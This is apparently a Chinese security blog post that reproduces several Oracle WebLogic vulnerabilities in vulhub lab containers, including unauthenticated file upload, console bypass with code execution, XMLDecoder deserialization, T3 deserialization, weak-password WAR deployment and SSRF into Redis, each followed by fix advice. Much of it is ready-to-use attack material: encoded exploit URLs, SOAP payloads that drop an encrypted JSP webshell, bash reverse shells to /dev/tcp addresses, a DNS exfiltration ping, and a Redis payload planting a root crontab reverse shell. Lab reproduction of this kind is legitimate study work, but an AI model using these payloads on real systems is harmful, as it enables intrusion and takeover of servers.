WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic Server具有标准和可扩展性的优点,对业内多种标准都可全面支持,包括EJB、JSP、Servlet、JMS、JDBC、XML(标准通用标记语言的子集)和WML,使Web应用系统的实施更为简单,并且保护了投资,同时也使基于标准的解决方案的开发更加简便,同时WebLogic Server以其高扩展的架构体系闻名于业内,包括客户机连接的共享、资源pooling以及动态网页和EJB组件群集。
默认端口为:7001
Weblogic Web Service Test Page中有两个未授权页面,可以上传任意文件。但是有一定的限制,该页面在开发模式下存在,在生产模式下默认不开启,如果是生产模式,需要登陆后台进行勾选启动web服务测试页。
页面测试页面有两个,都可以未授权任意上传文件。
/ws_utc/config.do
/ws_utc/begin.do
利用前提是:该测试页面处于开发模式下。
10.3.6
12.1.3
12.2.1.2
12.2.1.3
环境:利用vulhub的环境,进入相应的目录后,docker-compose up -d
访问http://your-ip:7001/console/login/LoginForm.jsp
http://192.168.255.128:7001/console/login/LoginForm.jsp
因为使用的docker的开发环境,需要查看后台登录密码。(weblogic默认后台密码为:weblogic/weblogic)
docker-compose logs | grep password
用户名和密码:weblogic/wjONT3nU
我在物理机上登录时,用户和密码都正确但是出现拒绝访问;虚拟机可以正常登录,这是因为没有开启远程IP登录的原因。
在base-domain—>console->server->AdminServer—>Listen Address处设置需要远程登录的IP即物理机的IP或者直接设置0.0.0.0全部ip都可远程访问。
如果是生产模式下复现漏洞,登录后台后勾选启动web服务测试页。
测试/ws_utc/config.do页面
访问http://192.168.255.128:7001/ws_utc/config.do
设置Work Home Dir为ws_utc应用的静态文件css目录,因为默认上传目录不在Web目录无法执行webshell,这里设置为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
(css访问不需要任何权限)
名字和密码随便设置,上传一个webshell脚本文件,点击提交,burpsuite抓包。
返回一个时间戳1633502727693,上传的文件路径为:http://192.168.255.128:7001/ws_utc/css/config/keystore/[时间戳]_[⽂件名]
,即可执⾏ webshell,我这上传的是冰蝎的jsp文件,所以我用冰蝎连接获取webshell。
测试/ws_utc/begin.do页面
条件:
1./ws_utc/begin.do使用的工作目录是在/ws_utc/config.do中设置的Work Home Dir;
2.利用需要知道部署应用的web目录;
3.在生产模式下不开启,后台开启后,需要认证。
访问http://192.168.255.128:7001/ws_utc/begin.do,上传jsp脚本。
错误可忽略。
查看响应包,找出上传的文件路径。/css/upload/RS_Upload_2021-10-06_07-16-37_823/import_file_name_1.jsp
访问路径
http://192.168.255.128:7001/ws_utc/css/upload/RS_Upload_2021-10-06_07-16-37_823/import_file_name_1.jsp
1.启动生产模式后,Config.do页面登录授权后才可访问。
2.升级到最新版本,目前生产模式下已取消这两处上传文件的地方。
WebLogic 任意文件上传漏洞(CVE-2018-2894)
WebLogic两处任意文件上传漏洞动态分析(CVE-2018-2894)
未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。
通过访问console.portal 路径并且触发 handle 执行。
详细请移步:CVE-2020-14882:Weblogic Console 权限绕过深入解析
10.3.6.0
12.1.3.0
12.2.1.3
12.2.1.4
14.1.1.0
环境:vulhub
CVE-2020-14883: 权限绕过漏洞的poc:
http://192.168.255.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
解码后为:
http://192.168.255.128:7001/console/images/../console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle("com.bea:Name=base_domain,Type=Domain")
经测试…/需要二次url encode。
访问即可进入后台,达到未授权访问的效果但是这里没有部署安装的按钮,也就是说不能像常规进入后台后写shell进去,这里就需要用到远程加载XML文件拿shell。
CVE-2020-14882: 代码执行漏洞的poc(写入文件):
http://192.168.255.128:7001/console/images/%252E%252E%252Fconsole.portal?
_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22);
解码后:
http://192.168.255.128:7001/console/images/../console.portal?
_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch /tmp/test');");
访问路径,发现是404。
其实已经创建了文件,可进入容器查看。
这里执行反弹shell的xml文件poc.xml:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
[url]http://www.springframework.org/schema/beans[/url] [url]http://www.springframework.org/schema/beans/spring-beans.xsd[/url]">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>/bin/bashvalue>
<value>-cvalue>
<value>& /dev/tcp/192.168.255.128/6669 0>&1]]>value>
list>
constructor-arg>
bean>
beans>
1、及时下载官方补丁进行升级修复。下载地址如下:https://www.oracle.com/security-alerts/cpuoct2020.html
2、关闭后台/console/console.portal的访问权限。
3、修改后台默认地址。
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传
入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
在CVE-2017-3506之前,不对payload进行验证,使用object tag可以RCE,CVE-2017-3506的补丁在 weblogic/wsee/workarea/WorkContextXmlInputAdapter.java 中添加了validate方法,在解析xml时,Element字段出现object tag就抛出运行时异常,不过这次防护力度不够,导致了CVE-2017-10271,利用方式类似,使用了void tag进行RCE,于是CVE-2017-10271的补丁将object、new、method关键字加入黑名单,针对void和array这两个元素是有选择性的抛异常,其中当解析到void元素后,还会进一步解析该元素中的属性名,若没有匹配上index关键字才
会抛出异常。而针对array元素而言,在解析到该元素属性名匹配class关键字的前提下,还会解析该属性值,若没有匹配上byte关键字,才会抛出运行时异常。总之,这次的补丁基本上限定了不能生成java实例。
10.3.6.0
12.1.3.0.0
12.2.1.1.0
环境:vulhub
访问http://192.168.255.128:7001/wls-wsat/CoordinatorPortType
若出现以下回显页面,只要是在wls-wsat包中的皆受到影响,可以查看web.xml查看所有受影响的url,说明存在该漏洞。
user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war\WEB-INF
受影响的url。
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
burp在当前页面抓包后修改内容,写入冰蝎jsp脚本文件。
添加的内容为:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jspstring>
<void method="println">
<string>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
]]>
string>
void>
<void method="close"/>
object>java>java>
work:WorkContext>
soapenv:Header>
<soapenv:Body/>
soapenv:Envelope>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bashstring>
void>
<void index="1">
<string>-cstring>
void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.255.128/5555 0>&1string>
void>
array>
<void method="start"/>void>
java>
work:WorkContext>
soapenv:Header>
<soapenv:Body/>
soapenv:Envelope>
1、前往Oracle官网下载10月份所提供的安全补丁:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
2、删除wls-wsat组件,再次访问返回404.
1.删除Oracle\Middleware\wlserver_10.3\server\lib\wls-wsat.war
2.删除user_projects\domains\base_domain\servers\AdminServer\tmp.internal\wls-wsat.war
3.删除C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\wls-wsat
4.重启Weblogic
此漏洞实际上是CVE-2017-10271的又一入口,CVE-2017-3506的补丁过滤了object;CVE-2017-10271的补丁过滤了new,method标签,且void后面只能跟index,array后面只能跟byte类型的class;CVE-2019-2725的补丁过滤了class,限制了array标签中的byte长度。
bea_wls9_async_response.war
wsat.war
10.3.*
12.1.3
环境:vulhub-weak_password
(因为weak_password环境的weblogic版本是10.3.6,在受影响的范围内。)
访问http://192.168.255.128:7001/_async/AsyncResponseService
回显如下,则存在漏洞。
受影响的url不仅仅是/_async/AsyncResponseService还有如下url受影响。
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceSoap12
/_async/AsyncResponseServiceSoap12Jms
/_async/AsyncResponseServiceSoap12Https
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xxwsa:Action>
<wsa:RelatesTo>xxwsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bashstring>
void>
<void index="1">
<string>-cstring>
void>
<void index="2">
<string>ping `id`.bkzu3y7lywkcl9svfe5mroou4laby0.burpcollaborator.netstring>
void>
array>
<void method="start"/>void>
work:WorkContext>
soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
soapenv:Body>soapenv:Envelope>
1、升级本地JDK环境
2、及时安装官方补丁
远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任意反序列化 payload 的目的。
在InboundMsgAbbrev中resolveProxyClass中,resolveProxyClass是处理rmi接口类型的,只判断了java.rmi.registry.Registry,这就会导致任意一个rmi接口都可绕过。核心部分就是JRMP(Java Remote Method protocol),在这个PoC中会序列化一个RemoteObjectInvocationHandler,它会利用UnicastRef建立到远端的tcp连接获取RMIregistry,加载回来再利用readObject解析,从而造成反序列化远程代码执行。
10.3.6.0
12.1.3.0
12.2.1.1
12.2.1.2
相关漏洞有:
CVE-2015-4852
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2893
CVE-2016-0638
环境:vulhub
这里先使用nmap扫描一下是否开启了WebLogic T3服务。
nmap -n -v -p 7001,7002 192.168.1.10 --script=weblogic-t3-info
使用k8工具写入shell。
shell的绝对路径为:
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/wlscmd.jsp
使用脚本获取交互shell。
python cve-2018-2628.py
1.过滤t3协议。
在域结构中点击 安全->筛选器
连接筛选器填: weblogic.security.net.ConnectionFilterImpl 保存后重启Weblogic.
由于管理员的安全意识不强,或者配置时存在疏忽,会导致后台存在弱口令或者默认的用户名/口令。
通过弱口令登录后台后,部署恶意的war包可直接getshell。
全版本
环境:vulhub
弱口令为:weblogic/Oracle@123
通过弱口令登录后台点击部署—>安装
选择本机上的恶意war包。
简单制作war包jar -cvf xx.war xx.jsp
将此部署安装为应用程序。
输入命名即为访问恶意脚本文件路径的上层路径,点击完成。
访问http://192.168.255.128:7001/2/1.jsp?pwd=123&i=id,获取shell。
1、修改默认密码和弱口令,加强密码的复杂度。
Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口,进而攻击内网中redis、fastcgi等脆弱组件。
10.0.2.0
10.3.6.0
环境:vulhub
验证漏洞
访问该路径,如果能正常访问,说明存在该漏洞。
/uddiexplorer/SearchPublicRegistries.jsp
点击search,burp抓取数据包。
修改请求方式为GET,将operator的值修改为http%3a%2f%2f192.168.255.128:7001
,发现返回如下信息,说明开放7001端口,但是不是http协议。
<p>An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://192.168.255.128:7001 returned a 404 error code (Not Found). Please ensure that your URL is correct, and the web service has deployed without error.
修改为http%3a%2f%2f192.168.255.128:7002
,返回信息如下,说明端口7002未开放。
<p>An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '192.168.255.128', port: '7002'
修改为http%3a%2f%2f192.168.255.128:80
,发现返回如下信息,说明开放80端口,是http协议。
<p>An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://192.168.255.128:80 which did not have a valid SOAP content-type: text/html.
我们可以通过ssrf来探测内网存在主机以及端口开放的信息。
环境中存在开放了redis的主机,查看主机的IP。
docker inspect 容器ID
我们利用ssrf来探测验证该主机是否存在redis服务器。
确实有redis服务器,利用redis服务器burp改包直接反弹shell脚本到本机kail上(192.168.255.131)。
operator=http://192.168.112.2:6379/test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.255.131/8888 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
URL编码后:
operator=http://192.168.112.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.255.131%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
kali上监听8888端口,成功反弹shell。
1、删除SearchPublicRegistries.jsp文件或修改SearchPublicRegistries.jsp文件后缀为不解析后缀,如SearchPublicRegistries.jspxxx,后重启Weblogic。
2、升级至不受影响的版本。
WebLogic存在的漏洞有很多,这里总结主要是对一些常见的漏洞复现和分析(主要是vulhub上的环境)当然了目前网上都有很多自动化的检测和利用工具,这里手动验证是为了加深印象;漏洞的原理很多都是参考大佬们的文章,个人其实还是有很多不是很理解(菜狗)这里对大佬们表示衷心的感谢。后续继续补充其他漏洞复现。